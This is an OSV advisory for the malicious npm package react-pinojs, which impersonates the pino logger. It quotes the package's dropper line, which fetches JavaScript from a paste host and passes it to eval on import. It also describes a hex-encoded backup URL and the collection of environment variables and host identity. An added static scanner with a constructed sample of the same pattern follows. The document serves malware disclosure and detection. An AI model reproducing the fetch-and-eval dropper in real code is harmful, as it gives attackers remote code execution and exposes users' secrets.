MAL-2026-5488

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5488
Published
2026-06-09T21:31:27Z
Modified
2026-06-09T21:46:29.657591528Z
Summary
Malicious code in react-pinojs (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63)

Package impersonates the popular pino logger (homepage points to getpino.io, description mimics pino's tagline) and executes a remote-code-execution dropper on import. lib/writer.js — loaded transitively by the main entry pino.js — performs require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); }), passing arbitrary attacker-controlled JavaScript fetched from an anonymous, mutable paste host directly to eval at module load time. Before the eval fires, writer.js assembles a data object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, which is in scope for the eval'd payload. A second hex-encoded channel is hidden in writer.js: byte arrays decode to the strings 'axios', 'get', 'then', and the URL https://www.jsonkeeper.com/b/HY6M6 — a backup fetch endpoint concealed from trivial source greps. Any project that runs require('react-pinojs') (or imports it) executes attacker-controlled code with access to the installer's environment variables, hostname, username, and MAC addresses.
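As an added example (not code from the advisory, from OSV, or from the package), the following static triage scanner looks for the two indicators described above in lib/writer.js: eval() applied to a fetched HTTP response, and numeric byte arrays that decode to 'axios', 'get', 'then' or a jsonkeeper.com URL. The sample source it scans is constructed, uses placeholder URLs, and is only inspected as text, never executed.

```javascript
// Added example, not from the advisory or the package: static triage for the
// indicators described in the MAL-2026-5488 details.
const SUSPICIOUS = ['axios', 'get', 'then', 'jsonkeeper.com'];

// Decode every array of small numeric literals (e.g. [0x61, 0x78] or [97, 120])
// into a printable string, making a hex-encoded channel visible to a grep.
function decodeByteArrays(src) {
  const lit = '(?:0x[0-9a-fA-F]{1,2}|\\d{1,3})';
  const re = new RegExp(`\\[\\s*(${lit}(?:\\s*,\\s*${lit})+)\\s*\\]`, 'g');
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    const bytes = m[1].split(',').map((t) => Number(t.trim()));
    if (bytes.every((b) => b >= 0x20 && b <= 0x7e)) out.push(String.fromCharCode(...bytes));
  }
  return out;
}

function scanSource(src) {
  const decoded = decodeByteArrays(src);
  const findings = [];
  // eval() applied to a resolved HTTP response inside a .then() callback
  if (/\.then\s*\([^)]*=>\s*\{?\s*eval\s*\(/.test(src)) findings.push('eval-of-fetched-response');
  // process.env plus host identity assembled in the same file
  if (/process\.env/.test(src) && /os\.(hostname|userInfo|networkInterfaces)\s*\(/.test(src)) {
    findings.push('host-fingerprint-collection');
  }
  for (const s of decoded) {
    if (SUSPICIOUS.some((n) => s.includes(n))) findings.push(`hex-encoded:${s}`);
  }
  return { decoded, findings };
}

// Constructed sample mimicking the described pattern (placeholder URLs, not the
// real paste-host paths). It is a string that is scanned, never run.
const toBytes = (s) => '[' + [...s].map((c) => c.charCodeAt(0)).join(', ') + ']';
const SAMPLE = [
  "const data = { env: process.env, host: os.hostname(), user: os.userInfo().username };",
  "require('axios').get('https://paste.example/b/PLACEHOLDER').then(r => { eval(r.data.content_o); });",
  `const k = [${toBytes('axios')}, ${toBytes('get')}, ${toBytes('then')}];`,
  `const u = ${toBytes('https://www.jsonkeeper.com/b/PLACEHOLDER')};`,
].join('\n');

console.log(scanSource(SAMPLE).findings);
```

Running the block on a package's lib/ files before install is the intended use; a clean file yields an empty findings list.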

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T21:31:27Z",
            "versions": [
                "1.0.6"
            ],
            "sha256": "db767edd3581eec08793cb669f0ec59351e61f31501b6d4287b86baea512bb63",
            "id": "IN-MAL-2026-005247",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T21:37:56.744147039Z"
        }
    ]
}
References
Credits

Affected packages

npm / react-pinojs

Package             Affected ranges   Affected versions
npm / react-pinojs  1.*               1.0.6

Database specific

indicators
{
    "evidence_files": [
        {
            "sha256": "b6d314d7ec721484bb7a6d72c9dc580e8b9e9d53ca459480f98a20366b823c7d",
            "tlsh": "781120a2c392a414223017f248db4820bee5f35120d3418cbebc8ada2bf39e17154fa8",
            "path": "lib/writer.js"
        },
        {
            "sha256": "3d5bec867b573c4184c8640f1690df68c995d29527c25e2366161d5416293ce6",
            "tlsh": "1201bd10cd788d6308f828919c290187aa609c5b581cbd5d73d3631c0f4e5bf15ba16d",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-asMwMjTL2bDYtIH7kYErA1jWdgHpY8qd77qHyni4T+Gfn8WoXUJ4lm07sOI47yqvgaFLFvCs+vH/U61Ckj0NdA==",
                "sha1": "1c3d3d0b4b04a4c6c4750d62e884ce7f19f8e4ed"
            },
            "filename": "react-pinojs-1.0.6.tgz"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-pinojs/MAL-2026-5488.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]